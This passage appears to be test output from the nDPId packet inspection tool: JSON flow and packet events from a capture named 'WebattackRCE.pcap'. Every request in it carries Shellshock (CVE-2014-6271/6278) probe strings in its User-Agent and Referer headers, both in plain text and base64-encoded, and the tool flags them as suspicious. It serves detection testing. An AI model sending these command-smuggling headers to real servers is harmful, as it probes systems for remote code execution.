Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} 
-01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277434,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0WFAAEAGaox\/AAABfwAAAcVOH5BRy+mS7UbDZYAYAED+\/AAAAQEICp1m\/eKdZv3iR0VUIC9waHAtY2dpIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277434,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277436,"pkt":"AAAAAAAAAAAAAAAACABFAAEIqnVAAEAGkXh\/AAABfwAAAcVQH5Bll5K9uysWxoAYAED+\/AAAAQEICp1m\/eOdZv3jR0VUIC9waHAuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} 
-01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":475,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277436,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277437,"pkt":"AAAAAAAAAAAAAAAACABFAAEJlAhAAEAGp+R\/AAABfwAAAcVSH5AUHqzKqBdRL4AYAED+\/QAAAQEICp1m\/eWdZv3lR0VUIC9waHAuZmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":476,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277437,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php.fcgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
-01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
